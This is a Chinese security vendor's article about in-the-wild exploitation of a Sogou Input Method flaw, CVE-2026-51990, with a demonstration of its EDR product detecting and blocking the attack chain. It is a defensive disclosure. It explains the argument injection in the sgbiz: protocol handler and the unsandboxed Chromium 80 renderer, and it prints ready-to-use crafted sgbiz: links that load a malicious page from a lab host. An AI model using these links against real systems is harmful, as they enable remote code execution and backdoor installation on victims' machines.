网易首页 > 网易号 > 正文 申请入驻

搜狗输入法CVE-2026-51990在野利用:联软UniEDR检测有效、阻断到位

0
分享至



近日,联软安全运营团队监测到互联网披露了针对 Windows 版搜狗输入法远程代码执行漏洞(CVE-2026-51990)的在野攻击:攻击者仅需一条 sgbiz: 链接,即可将恶意网页送入无沙箱的内置 Chromium 并执行任意代码,该漏洞目前已被用于投放 GRAYRABBIT 后门。联软安全运营团队已第一时间完成漏洞复现与利用链验证,并同步实测了 UniEDR 的防护效果——内置专家规则(规则名称:通过搜狗输入法远程执行代码(CVE-2026-51990))可实时检出利用行为,开启实时拦截后可在恶意渲染进程启动阶段完成阻断,攻击在代码执行前即告失败。以下为检测阻断实测过程与完整漏洞分析。

一、联软 UniEDR 检测与阻断实测

联软安全运营团队已在实验环境中完整复现该漏洞的利用链,并以此验证 UniEDR 的防护效果。UniEDR 内置专家规则(规则名称:通过搜狗输入法远程执行代码(CVE-2026-51990),告警名称“通过搜狗输入法远程执行代码(CVE-2026-51990)”)可实时检出漏洞利用行为;开启实时拦截后,可在恶意渲染进程启动阶段直接阻断,使攻击链无法走完。

① 访问恶意链接:本地计算器被直接拉起,说明漏洞利用成功,任意代码已在本机执行。



② UniEDR 实时告警:规则 ID 200330 命中,风险等级为“高”,攻击链上的每一步进程创建均被完整记录。



③ 告警详情可完整还原攻击链:(点击sgbiz链接)msedge.exe → biz_helper.exe → SGMyInput.exe → SGWebRender.exe 的逐级创建关系清晰可见,并保留关键进程命令行,为溯源与处置提供直接证据。



④ 开启实时拦截后,SGWebRender.exe 在启动阶段即被终止,恶意页面始终停留在“正在加载”,页面代码无法执行,漏洞利用被彻底阻断。



实测表明,UniEDR 对搜狗输入法 CVE-2026-51990 的利用行为具备“检测—分析—阻断”的完整能力闭环:检测环节规则精准命中、告警及时;分析环节进程链与命令行可完整回溯;阻断环节在恶意渲染进程启动前完成拦截,攻击以失败告终。

下文将完整复现该漏洞的成因与利用链,以便说明 UniEDR 究竟检测到了什么、又阻断在何处。

二、漏洞背景

近日,联软安全运营团队发现针对 Windows 版搜狗输入法的野外攻击。攻击者(公开报告记为 UNC3569)以一条 sgbiz: 链接将受害者引导至皮肤商城的内置浏览器,再在其中触发 V8 n-day 漏洞并植入后门。目前该攻击已被 UNC3569 组织用于投放 GRAYRABBIT 后门

(文章来源:https://www.gendigital.com/blog/insights/research/one-click-backdoor-sogou)。

三、漏洞复现

CVE-2026-51990

搜狗输入法并非单一可执行文件,而是一组通过 Windows 自定义协议(如 sgbiz:)通信的组件集合。在注册表 HKEY_CLASSES_ROOT\sgbiz 下可以看到,搜狗输入法注册了以下程序来解析 sgbiz 协议:

C:\Program Files (x86)\SogouInput\Components\biz_center\1.0.0.3315\biz_helper.exe 去解析 sgbiz 协议。



因此,用户打开任何以 sgbiz: 开头的 URL,Windows 都会将其交给协议处理程序 biz_helper.exe。更重要的是,该协议允许调用方指定启动哪一个搜狗组件,并为其附带任意命令行参数。当 biz_helper.exe 收到携带 sg_process 命令的 sgbiz: URL 时,内容如下:

sgbiz:sg_process?module=sgmyinput.exe¶m=-page=skincenter -url=http://192.168.145.132/qq.html

它会从 URL 中提取以下五个参数:

module: 要启动的搜狗可执行文件的名称

param: 传递给该可执行文件的命令行参数

work_dir: 工作目录

start_mode: 启动进程的方式

start_show: 窗口显示状态

但 param 参数没有任何校验:从 URL 中取出后仅做一次 URL 解码,便被原封不动地作为命令行参数传递给 module 所指向的任意可执行文件。这意味着攻击者可以构造一条链接,任意启动搜狗的可执行文件并注入任意命令行参数——这也为第二个漏洞埋下了伏笔。

SGMyInput.exe:可加载任意 URL

SGMyInput.exe 是皮肤类界面,-page= 决定打开哪一模块 UI。其中 skincenter 页面是皮肤市场,它会创建一个 CEF(Chromium 嵌入式框架)Webview 来显示皮肤商店。Webview 就绪后,程序会检查命令行中是否带有 -url,若有则将指定 URL 交给下一步渲染。值得一提的是,搜狗输入法对传入的 URL 未做任何校验,任何 URL 都会被渲染。

攻击者可以构造如下链接,通过 SGMyInput.exe 初始化 skincenter 模块,指定的 URL 即会被渲染:

sgbiz:sg_process?module=sgmyinput.exe¶m=-page=skincenter -url=http://192.168.145.132/qq.html

Chromium V8 n-day

搜狗输入法的皮肤渲染进程为 SGWebRender.exe,它本身只是一个薄启动器,实际加载的 DLL 为 SGMiniBrowserHelperHost1.0.0.8.dll。



该 DLL 捆绑的 libcef.dll 版本为 CEF 80.1.16 / Chromium 80.0.3987.163,版本严重落后,存在大量 V8 n-day 漏洞。



研究发现,搜狗输入法直接禁用了 Chromium 沙箱,同时也关闭了同源策略。这意味着 SGWebRender.exe 渲染器一旦被攻破,原生 shellcode 便以当前用户权限直接执行,无需再做额外逃逸。

四、完整攻击链利用

攻击者可以构造如下恶意链接(需进行两次 URL 编码):

sgbiz:sg_process?module=sgmyinput.exe¶m=-page%3Dskincenter%20-url%3Dhttp%253a%252f%252f192.168.145.132%252fpoc1.html

当用户点击该链接后,Windows 识别到 sgbiz 协议,随即拉起 biz_helper.exe 进行解析。



biz_helper.exe 识别到 module 参数为 sgmyinput.exe,随即启动 sgmyinput.exe 初始化 skincenter 模块,并将 URL 传递至下一步渲染。



该网页包含触发 CVE-2021-38003(V8 漏洞)的 JavaScript 代码,一旦 SGWebRender.exe 渲染该页面,内嵌的 shellcode 便会随之执行。



五、漏洞影响范围



六、漏洞处置



七、修复建议

官方已发布修复版本,请及时升级。下载地址:

https://shurufa.sogou.com/windows

八、总结

Windows 版搜狗输入法(16.3.0.3498 之前)存在自定义协议缺陷(CVE-2026-51990):攻击者仅需一条 sgbiz: 链接,即可将恶意网页送入无沙箱的内置 Chromium 80 并执行任意代码,进而植入后门。本次实测证明,联软 UniEDR 已具备对该漏洞利用的完整防护能力——专家规则 200330 可实时检出,开启实时拦截后可在恶意渲染进程启动阶段阻断利用。建议用户尽快将搜狗输入法升级至 16.3.0.3498 或更高版本。

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
泽连斯基反驳鲁比奥:“你们不能一面与俄罗斯谈判未来的经济项目,一面说我们陷入外交僵局”

泽连斯基反驳鲁比奥:“你们不能一面与俄罗斯谈判未来的经济项目,一面说我们陷入外交僵局”

政知新媒体
2026-10-09 19:38:01
我为什么相信懂车帝?

我为什么相信懂车帝?

葱哥说
2026-10-09 13:02:32
10月7日三周年——暴力口号让支持者却步,欧洲巴勒斯坦支持者集会人数大幅减少

10月7日三周年——暴力口号让支持者却步,欧洲巴勒斯坦支持者集会人数大幅减少

老王说正义
2026-10-10 09:59:28
深圳春秋假被投诉了,评论区吵到失控:这锅到底谁来背?

深圳春秋假被投诉了,评论区吵到失控:这锅到底谁来背?

今日搞笑分享
2026-10-11 02:14:00
医生发现:常吃红薯的糖尿病患者,用不了多久,身体或有6大变化

医生发现:常吃红薯的糖尿病患者,用不了多久,身体或有6大变化

王医生健康讲坛
2026-10-11 04:45:04
布云朝克特0-2止步次轮!赛中露出大肚腩引热议 职业网球手自律堪忧

布云朝克特0-2止步次轮!赛中露出大肚腩引热议 职业网球手自律堪忧

颜小白的篮球梦
2026-10-10 18:28:52
网传高盛预测中国房地产还会有新高点,评论区炸锅,骂声一片...

网传高盛预测中国房地产还会有新高点,评论区炸锅,骂声一片...

慧翔百科
2026-10-09 18:12:46
震惊!华人超市爆发枪战,情侣欲带狗进入,与保安冲突后拔枪互射,双双中弹倒地

震惊!华人超市爆发枪战,情侣欲带狗进入,与保安冲突后拔枪互射,双双中弹倒地

大洛杉矶LA
2026-10-11 02:35:21
接收中国转售天然气过冬,逼中国签自愿限制,欧盟剧本用错对象

接收中国转售天然气过冬,逼中国签自愿限制,欧盟剧本用错对象

喜你成疾药石无医
2026-10-11 05:39:59
8000万新援处子球,亚马尔13战狂造20球,巴萨3-0赫塔费豪取9连胜

8000万新援处子球,亚马尔13战狂造20球,巴萨3-0赫塔费豪取9连胜

钉钉陌上花开
2026-10-11 03:26:42
南非发生排外暴力事件 我使馆提醒公民加强防范

南非发生排外暴力事件 我使馆提醒公民加强防范

新京报
2026-10-10 17:01:17
大闸蟹全线崩盘?卖到“地板价”:雌蟹只要五六元,三两的蟹只卖10元

大闸蟹全线崩盘?卖到“地板价”:雌蟹只要五六元,三两的蟹只卖10元

华庭讲美食
2026-10-11 01:54:37
炸裂!日本妻子拍AV挽救婚姻,瞒夫出道老公崩溃,如今丈夫成粉丝

炸裂!日本妻子拍AV挽救婚姻,瞒夫出道老公崩溃,如今丈夫成粉丝

悠悠说世界
2026-08-17 13:48:27
12.8亿卖掉总统,卖掉工厂,卖掉国家,两年后两发子弹穿胸而过

12.8亿卖掉总统,卖掉工厂,卖掉国家,两年后两发子弹穿胸而过

墨策讲历史
2026-08-21 19:27:44
卫健委已将左氧氟沙星列为重点监控药物!提醒:服用千万注意

卫健委已将左氧氟沙星列为重点监控药物!提醒:服用千万注意

健康科普365
2026-10-07 11:35:08
12:0!广东末节反扑失败,3锋线激活,博日奇缺硬解能力仅得6分

12:0!广东末节反扑失败,3锋线激活,博日奇缺硬解能力仅得6分

曦言说
2026-10-11 04:50:28
告诉你一个心理学真相:你抑郁焦虑,原来是你缺乏强者思维

告诉你一个心理学真相:你抑郁焦虑,原来是你缺乏强者思维

松果正念袁老师
2025-02-17 20:22:19
炸裂!曝女领导婚内出轨多人,聊天记录大胆,女方撩拨攻势猛烈

炸裂!曝女领导婚内出轨多人,聊天记录大胆,女方撩拨攻势猛烈

历史点行
2026-10-10 13:23:35
92分钟遭绝平,1-1,曼联遭热刺逼平,连续4轮不胜

92分钟遭绝平,1-1,曼联遭热刺逼平,连续4轮不胜

侧身凌空斩
2026-10-11 02:27:11
懂车帝与华为积怨已久,不惜血本硬刚鸿蒙智行

懂车帝与华为积怨已久,不惜血本硬刚鸿蒙智行

上峰视点
2026-10-10 16:21:12
2026-10-11 07:36:49
联软科技
联软科技
构建可控的互联世界!
230文章数 1关注度
往期回顾 全部

科技要闻

上世纪成熟的踏板,为何今天还会断裂?

头条要闻

港媒:梅艳芳骨灰被盗三个月无线索 歌迷会公开求助

头条要闻

港媒:梅艳芳骨灰被盗三个月无线索 歌迷会公开求助

体育要闻

十年回首:湖人三榜眼的夏天,与NBA无关

娱乐要闻

宋佳一串三大满贯 争议随之而来

财经要闻

双汇因抗生素超标共被罚1.29亿元

汽车要闻

千匹马力+三把锁/顶配能浮水 银河战舰700限时焕新价16.98万起

态度原创

教育
时尚
旅游
本地
军事航空

教育要闻

六年级思维训练,答对的学生寥寥无几

真爱返场|| 陪了我10年的好物,一年就等这么一回捡大漏

旅游要闻

假日热度持续领跑 文旅繁花点亮金城

本地新闻

踏访沙县第一村,寻国民小吃本源

军事要闻

美乌将举行新一轮会谈

无障碍浏览 进入关怀版